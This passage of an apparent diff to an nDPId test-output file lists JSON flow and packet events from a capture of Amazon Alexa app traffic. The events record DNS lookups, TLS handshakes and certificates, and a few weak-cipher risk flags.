{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041961,"flow_last_seen":1490976042150,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976042150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1490976042419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G69AAEAGvmqsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/VegAAAgQFtAQCCAoA9k7iAAAAAAEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1490976043609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043609,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzNAAEAGfuasECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9jeAAAAgQFtAQCCAoA9k78AAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1490976043611,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1490976043611,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WlZAAEARM16sECrYrBAqAalWADUAK0G7veEBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="} 00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -211,864 +211,864 @@ 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976043612,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1490976043811,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1490976043811,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP0pFAAEARuxKsECoBrBAq2AA1qVYAO\/ZCveGBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAAbAARIFc6H"} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976043811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.135"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JoxAAEAGJqusECrYSBXOh6SRAbtDcGnhAAAAAKAC\/\/+2eAAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bx1AAEAG3hmsECrYSBXOh6SSAbsCViBwAAAAAKAC\/\/9BAwAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1490976043869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043869,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnhhAAOcGCCpIFc6HrBAq2AG7pJISbmyuAlYgcXASH\/4uVQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1490976043870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043870,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobx5AAEAG3iysECrYSBXOh6SSAbsCViBxEm5sr1AQAVd4xgAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1490976043873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043873,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwUbtAAOcGVIdIFc6HrBAq2AG7pJG1BAKQQ3Bp4nASH\/5rUgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1490976043875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043875,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJo1AAEAGJr6sECrYSBXOh6SRAbtDcGnitQQCkVAQAVe1wwAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043875,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044189,"flow_last_seen":1490976044189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1490976044189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044189,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8KphAAEAGHFesECrYNF7ohrJpAbvSj2UKAAAAAKAC\/\/8X6wAAAgQFtAQCCAoA9k+SAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044219,"flow_last_seen":1490976044219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044219,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1490976044219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044219,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8UU1AAEAG9aGsECrYNF7ohrJqAbsS8h7YAAAAAKAC\/\/8dtwAAAgQFtAQCCAoA9k+VAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1490976044265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044265,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwK9ZAAOcGdCQ0XuiGrBAq2AG7smlcwjrL0o9lC3ASH\/7s8AAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1490976044267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044267,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKplAAEAGHGqsECrYNF7ohrJpAbvSj2ULXMI6zFAQAVc3YgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044189,"flow_last_seen":1490976044269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044269,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1490976044285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044285,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZ65AAOcGOEw0XuiGrBAq2AG7smoL+FEyEvIe2XASH\/4tIwAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1490976044287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044287,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoUU5AAEAG9bSsECrYNF7ohrJqAbsS8h7ZC\/hRM1AQAVd3lAAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044219,"flow_last_seen":1490976044288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044288,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044189,"flow_last_seen":1490976044331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044331,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044219,"flow_last_seen":1490976044404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044404,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1490976044419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G7BAAEAGvmmsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/UsgAAAgQFtAQCCAoA9k+qAAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044439,"flow_last_seen":1490976044439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044439,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 